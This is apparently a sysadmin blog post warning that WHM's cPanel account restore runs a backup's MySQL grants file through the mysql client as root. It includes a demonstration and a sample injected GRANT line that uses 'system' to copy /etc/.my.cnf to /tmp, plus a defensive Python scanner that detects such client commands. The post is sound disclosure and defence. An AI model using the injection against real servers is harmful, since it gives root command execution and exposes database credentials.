Don’t restore cPanel backup from untrusted source

In WHM, there is a feature "restore account" which is used to restore a full account backup. Normal users can generate the backup from cPanel, and it contains all the information for an account, including the files and metadata.

One of the metadata items is the MySQL grants file, which is located inside the backup archive. When you restore the account using the WHM UI or the restorepkg command, this MySQL meta file is restored as the root user.
Now you may be thinking that there's nothing wrong and everything looks normal. But this is really, really bad, because you can embed arbitrary commands in SQL files, and those commands will execute when the file is restored as the root user. Let me explain.


root@server1 [/home/prajith]# cat mysql.sql
\! id
root@server1 [/home/prajith]# mysql < mysql.sql
uid=0(root) gid=0(root) groups=0(root)
root@server1 [/home/prajith]

So we can insert any Linux commands into the MySQL meta file, and they will be executed as root while the account is being restored.

Here is an example:

GRANT USAGE ON *.* TO 'whmtest'@'localhost' IDENTIFIED BY PASSWORD '*A4E12252EACEA5A79<XXXXX>E11D47296FE237D5897'\g system /etc/.my.cnf >> /tmp/test.txt;
GRANT ALL PRIVILEGES ON `whmtest\_pop`.* TO 'whmtest'@'localhost';

While restoring the account, mysql will execute the Linux commands through its system function, and the output will be saved to /tmp/test.txt; later we can read this file using an HTTP request. So don't restore backups from untrusted sources 😀
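As an added illustration that is not part of the original post, here is a small pre-restore check in Python that reads a grants file the way the mysql command-line client does: it blanks out quoted literals and comments, then reports the client-side commands that remain outside them (\! and system, which spawn a shell; \. and source, which pull in another file). These commands are handled by the mysql client process, never by the server, which is why they run as whoever invokes the restore. The sample grants, the placeholder hash and the /tmp path are constructed for the example.

```python
import re
import sys

# Client-side commands of the mysql command-line client.  The client handles
# them itself and never sends them to the server, so they run with the
# privileges of whatever process feeds the file to mysql (root, in the
# restore scenario the post describes).  Named commands are only honoured at
# the start of a command; backslash commands work anywhere outside a literal.
BACKSLASH_COMMANDS = [
    (re.compile(r"\\!"), "shell escape (\\!)"),
    (re.compile(r"\\\."), "file include (\\.)"),
]
NAMED_COMMANDS = [
    (re.compile(r"(?i)\bsystem\b"), "shell escape (system)"),
    (re.compile(r"(?i)\bsource\b"), "file include (source)"),
]
COMMAND_BOUNDARY = re.compile(r";|\\[gG]")   # ends one command, starts the next


def mask_literals(line, quote):
    """Blank out quoted literals and line comments in one physical line,
    keeping its length so offsets still map back to the raw text.
    `quote` is the open quote carried over from the previous line (or None);
    the updated state is returned for the next line."""
    out = []
    i = 0
    while i < len(line):
        ch = line[i]
        if quote:
            if ch == "\\" and quote != "`" and i + 1 < len(line):
                out.append("  ")          # backslash escape: hide both chars
                i += 2
                continue
            if ch == quote:
                quote = None
            out.append(" ")
            i += 1
            continue
        if ch in "'\"`":
            quote = ch
            out.append(" ")
        elif ch == "#" or re.match(r"--(\s|$)", line[i:]):
            out.append(" " * (len(line) - i))   # rest of the line is a comment
            break
        else:
            out.append(ch)
        i += 1
    return "".join(out), quote


def find_client_commands(sql_text):
    """Return [(line_no, kind, text)] for every mysql client command found
    outside string literals and comments, in file order."""
    findings = []
    quote = None
    for line_no, raw in enumerate(sql_text.splitlines(), 1):
        masked, quote = mask_literals(raw, quote)
        # Offsets at which a new client command may begin on this line.
        starts = [0] + [m.end() for m in COMMAND_BOUNDARY.finditer(masked)]
        hits = []
        for pat, kind in BACKSLASH_COMMANDS:
            hits += [(m.start(), kind) for m in pat.finditer(masked)]
        for pat, kind in NAMED_COMMANDS:
            for m in pat.finditer(masked):
                if any(s <= m.start() and not masked[s:m.start()].strip()
                       for s in starts):
                    hits.append((m.start(), kind))
        for pos, kind in sorted(hits):
            findings.append((line_no, kind, raw[pos:].rstrip()))
    return findings


def safe_to_restore(sql_text):
    """True when the grants file contains no client-side commands."""
    return not find_client_commands(sql_text)


# Constructed sample in the shape of a cPanel account's MySQL grants file:
# two ordinary GRANT lines plus the two escape forms the post demonstrates.
SAMPLE_GRANTS = """\
-- constructed sample; the hash and paths below are placeholders
GRANT USAGE ON *.* TO 'acct'@'localhost' IDENTIFIED BY PASSWORD '*HASH\\! not a command';
GRANT ALL PRIVILEGES ON `acct\\_db`.* TO 'acct'@'localhost';
GRANT USAGE ON *.* TO 'acct'@'localhost'\\g system echo injected >> /tmp/CONSTRUCTED.txt;
\\! id
"""

if __name__ == "__main__":
    sql = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_GRANTS
    for line_no, kind, cmd in find_client_commands(sql):
        print(f"line {line_no}: {kind}: {cmd}")
    sys.exit(0 if safe_to_restore(sql) else 1)
```

Run it with the path of the extracted mysql.sql and it exits non-zero when anything is flagged, so it can gate a restore script. Note that a \! inside a quoted password hash is deliberately not reported, because the mysql client does not treat it as a command there; a safer design still is to apply the grants through a database driver, which never interprets client commands, rather than piping the file into the mysql binary.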
